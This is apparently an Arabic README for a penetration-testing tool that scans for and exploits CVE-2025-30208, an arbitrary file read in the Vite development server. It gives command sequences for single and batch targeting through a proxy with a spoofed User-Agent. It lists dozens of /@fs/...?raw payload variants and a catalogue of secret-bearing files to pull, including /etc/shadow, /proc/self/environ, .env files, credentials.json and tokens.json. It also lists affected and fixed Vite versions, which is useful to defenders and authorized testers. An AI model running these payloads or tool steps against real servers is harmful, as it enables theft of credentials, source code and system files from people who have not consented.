
CVE‑2025‑30208 هي ثغرة قراءة ملفات عشوائية متوسطة الشدة في خادم التطوير Vite (أداة بناء واجهات أمامية شائعة).
ماسح ثغرات متقدم لـ CVE-2025-30208 بميزات على مستوى المؤسسات
أداة اختبار اختراق احترافية لكشف ثغرة قراءة الملف التعسفي في Vite
🚀 بداية سريعة • 📋 الميزات • 🔧 الاستخدام • 📊 أمثلة • 🛡️ الأمان
هذه أداة ماسح ثغرات شاملة مصممة لاكتشاف واستغلال ثغرة CVE-2025-30208 في خوادم تطوير Vite. تسمح الثغرة بقراءة ملفات تعسفية عبر نقاط نهاية نظام ملفات Vite، مما قد يعرض ملفات التكوين الحساسة، كود المصدر، ومعلومات النظام.
تتميز الأداة الآن بـ بنية معيارية لسهولة الصيانة والتوسيع:
CVE-2025-30208.py - تطبيق الماسح الرئيسيpayloads.py - حمولات استغلال متقدمة (أكثر من 60 اختلافاً)sensitive_files.py - قاعدة بيانات شاملة للملفات الحساسة (أكثر من 200 ملف)html_template.py - قالب تقارير HTML محسن بأسلوب الهاكرزpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# تفعيل الوضع المفصل لمخرجات مفصلة
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[اضغط Enter مرتين للإنهاء]
CVE-2025-30208 > scan
# تكوين بروكسي
CVE-2025-30208 > proxy
أدخل البروكسي: http://127.0.0.1:8080
# تعيين رؤوس مخصصة
CVE-2025-30208 > headers
أدخل الرؤوس: {"User-Agent": "Custom Scanner"}
# تكوين تحديد المعدل
CVE-2025-30208 > rate
أدخل حد المعدل: 1.0
# إنشاء تقرير HTML جميل
CVE-2025-30208 > pull
# تشغيل خادم ويب لعرض التقرير
CVE-2025-30208 > web
# تشغيل خادم ويب على منفذ محدد
CVE-2025-30208 > web 8081
# إيقاف خادم الويب
CVE-2025-30208 > web off
يستخدم الماسح الآن أكثر من 60 اختلافاً في الحمولات منظمة في payloads.py:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
/app/{file_path}?raw??
/App/{file_path}?raw??
تختبر الأداة الآن أكثر من 200 ملف حساس منظمة في sensitive_files.py:
/etc/passwd - معلومات حسابات المستخدمين/etc/shadow - بيانات كلمة المرور المشفرة/etc/services - خدمات الشبكة/etc/hosts - تعيينات أسماء المضيفين/etc/fstab - جدول نظام الملفات/etc/ssh/sshd_config - تكوين خادم SSH/etc/crontab - مهام cron النظامية/etc/sudoers - تكوين sudo/proc/version - إصدار النواة/proc/cpuinfo - معلومات المعالج/proc/meminfo - معلومات الذاكرة/proc/self/environ - بيئة العملية/proc/self/cmdline - سطر أوامر العملية/proc/net/tcp - اتصالات TCP/proc/net/udp - اتصالات UDP.env - متغيرات البيئة.env.local - البيئة المحلية.env.production - بيئة الإنتاجconfig.json - تكوين التطبيقsettings.json - إعدادات التطبيقapplication.properties - تكوين Springapplication.yml - تكوين YAMLdatabase.yml - تكوين قاعدة البياناتsecrets.json - إدارة الأسرارpackage.json - تبعيات Node.jspackage-lock.json - تبعيات مقفلةyarn.lock - ملف قفل Yarnvite.config.js - تكوين Vitevite.config.ts - تكوين Vite بلغة TypeScripttsconfig.json - تكوين TypeScriptwebpack.config.js - تكوين Webpacknext.config.js - تكوين Next.jsnuxt.config.js - تكوين Nuxt.jsangular.json - تكوين Angularvue.config.js - تكوين Vue.jsrollup.config.js - تكوين Rollupeslint.config.js - تكوين ESLint.git/config - تكوين Git.gitignore - قواعد تجاهل Git.gitattributes - سمات Git.gitmodules - وحدات Git الفرعية.git/HEAD - الفرع الحالي.git/logs/HEAD - سجلات Git.git/refs/heads/master - فرع master.git/refs/heads/main - فرع mainREADME.md - توثيق المشروعCHANGELOG.md - سجل التغييراتLICENSE - معلومات الترخيصCONTRIBUTING.md - إرشادات المساهمةAUTHORS - معلومات المؤلفينTODO.md - قائمة المهامROADMAP.md - خريطة التطويرDockerfile - تكوين Dockerdocker-compose.yml - Docker Composedocker-compose.override.yml - تكوين التجاوز.dockerignore - قواعد تجاهل Dockerdocker-compose.prod.yml - تكوين الإنتاجdocker-compose.dev.yml - تكوين التطويرnginx.conf - تكوين Nginxapache2.conf - تكوين Apachehttpd.conf - تكوين خادم HTTP.htaccess - التحكم في الوصول لأباتشيweb.config - تكوين IISrobots.txt - توجيهات محركات البحثsitemap.xml - هيكل الموقعmanifest.json - بيان تطبيق الويبsw.js - عامل الخدمةfirebase.json - تكوين Firebasefirebase.rules - قواعد أمان Firebaseboot.ini - تكوين الإقلاعautoexec.bat - سكريبت التنفيذ التلقائيsystem.ini - تكوين النظامwin.ini - تكوين WindowsUsers - أدلة المستخدمينWindows - ملفات النظامProgram Files - أدلة التطبيقاتSystem - ملفات النظامLibrary - ملفات المكتباتApplications - ملفات التطبيقاتprivate/etc/hosts - ملف المضيفينprivate/etc/passwd - حسابات المستخدمينdatabase.db - قاعدة بيانات SQLitedatabase.sqlite - قاعدة بيانات SQLitedata.db - قاعدة بيانات البياناتdump.sql - تفريغ قاعدة البياناتschema.sql - مخطط قاعدة البياناتmigrations - ترحيلات قاعدة البياناتlogs - دليل السجلاتerror.log - سجلات الأخطاءaccess.log - سجلات الوصولapp.log - سجلات التطبيقdebug.log - سجلات التصحيحcombined.log - سجلات مجمعةbackup - دليل النسخ الاحتياطيbackup.sql - نسخة احتياطية لقاعدة البياناتbackup.zip - نسخة احتياطية مضغوطةdump - تفريغ البياناتexport - تصدير البياناتauth.json - تكوين المصادقةcredentials.json - تخزين بيانات الاعتمادkeys.json - إدارة المفاتيحtokens.json - تخزين الرموز المميزةjwt.json - تكوين JWToauth.json - تكوين OAuthapi.json - تكوين APIswagger.json - توثيق APIopenapi.json - مواصفات OpenAPIgraphql.json - تكوين GraphQLschema.json - مخطط APIcloudformation.yml - AWS CloudFormationserverless.yml - تكوين Serverlessterraform.tf - تكوين Terraformkubernetes.yml - تكوين Kubernetesk8s.yml - تكوين Kubernetesanalytics.json - تكوين التحليلاتmonitoring.json - إعداد المراقبةmetrics.json - تكوين المقاييسtelemetry.json - بيانات القياس عن بعدتولد الأداة الآن تقارير HTML جميلة بأسلوب الهاكرز مع:
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
CVE-2025-30208 > proxy
أدخل البروكسي: http://127.0.0.1:8080
CVE-2025-30208 > headers
أدخل الرؤوس: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
CVE-2025-30208/
├── CVE-2025-30208.py # تطبيق الماسح الرئيسي
├── payloads.py # حمولات استغلال متقدمة (أكثر من 60)
├── sensitive_files.py # قاعدة بيانات الملفات الحساسة (أكثر من 200)
├── html_template.py # قالب تقارير HTML محسّن
├── README.md # هذا التوثيق
├── requirements.txt # تبعيات بايثون
├── logs/ # دليل ملفات السجل
├── data_leak.html # تقارير HTML المولدة
├── data_leak.json # تقارير JSON المولدة
└── session.json # تكوينات الجلسة المحفوظة
نرحب بالمساهمات لتحسين هذه الأداة:
payloads.pysensitive_files.pyhtml_template.pyهذا المشروع مرخص لـ أغراض الاختبارات الأمنية التعليمية والمرخصة فقط.
⚠️ إخلاء مسؤولية قانوني: هذه الأداة مخصصة لأغراض الاختبارات الأمنية والبحث المرخصة فقط. يتحمل المستخدمون مسؤولية التأكد من حصولهم على الإذن المناسب قبل اختبار أي أنظمة. المؤلفون غير مسؤولين عن أي استخدام خاطئ لهذه الأداة.
⭐ إذا ساعدتك هذه الأداة، يرجى منحها نجمة! ⭐
بُنيَت بـ ❤️ لمجتمع الأمن
| الأمر | الوصف | مثال |
|---|
set <option> <value> | تعيين خيارات التكوين | set RHOST 192.168.1.100 |
show options | عرض الإعدادات الحالية | show options |
edit | محرر خيارات تفاعلي | edit |
run / exploit | تشغيل اختبار الثغرة | run |
batch | مسح دفعاتي لأهداف متعددة | batch |
scan | اكتشاف الملفات الحساسة | scan |
pull | تصدير النتائج إلى HTML/JSON | pull |
web [on|off|port] | خادم ويب لتقارير HTML | web 8080 |
save | حفظ تكوين الجلسة | save |
load | تحميل تكوين الجلسة | load |
test | اختبار الاتصال بالهدف | test |
validate | التحقق من التكوين الحالي | validate |
verbose | تبديل الوضع المفصل | verbose |
proxy | تكوين إعدادات البروكسي | proxy |
headers | تعيين رؤوس HTTP مخصصة | headers |
rate | تكوين تحديد المعدل | rate |
log | عرض معلومات التسجيل | log |
help / ? | عرض المساعدة | help |
exit / quit | الخروج من الأداة | exit |
| الخيار | الوصف | الافتراضي | التحقق |
|---|
RHOST | عنوان الخادم الهدف/ IP | - | التحقق من اسم المضيف/ IP |
RPORT | رقم منفذ الهدف | - | نطاق المنفذ (1-65535) |
FILEPATH | مسار الملف لاختباره | etc/passwd | التحقق من المسار |
PROXY | رابط بروكسي HTTP/HTTPS | - | التحقق من صيغة الرابط |
VERBOSE | تفعيل المخرجات المفصلة | false | التحقق من القيمة المنطقية |
RATE_LIMIT | التأخير بين الطلبات (بالثواني) | 0.3 | التحقق الرقمي |
THREADS | عدد الخيوط للمسح الدفعي | 5 | التحقق من العدد الصحيح |
TIMEOUT | مهلة الطلب (بالثواني) | 5 | التحقق من العدد الصحيح |
CUSTOM_HEADERS | رؤوس HTTP مخصصة (JSON) | {} | التحقق من صيغة JSON |
prettier.config.js - تكوين Prettierjest.config.js - تكوين Jestbabel.config.js - تكوين Babeltailwind.config.js - تكوين Tailwind CSS| الملف | الوصف | الصيغة |
|---|
data_leak.html | تقرير ثغرات HTML محسّن بأسلوب الهاكرز | HTML |
data_leak.json | تصدير JSON منظم | JSON |
sensitive_files_discovery.json | الملفات الحساسة المكتشفة | JSON |
session.json | تكوين الجلسة المحفوظة | JSON |
logs/cve_2025_30208_YYYYMMDD_HHMMSS.log | سجلات تدقيق مفصلة | نص |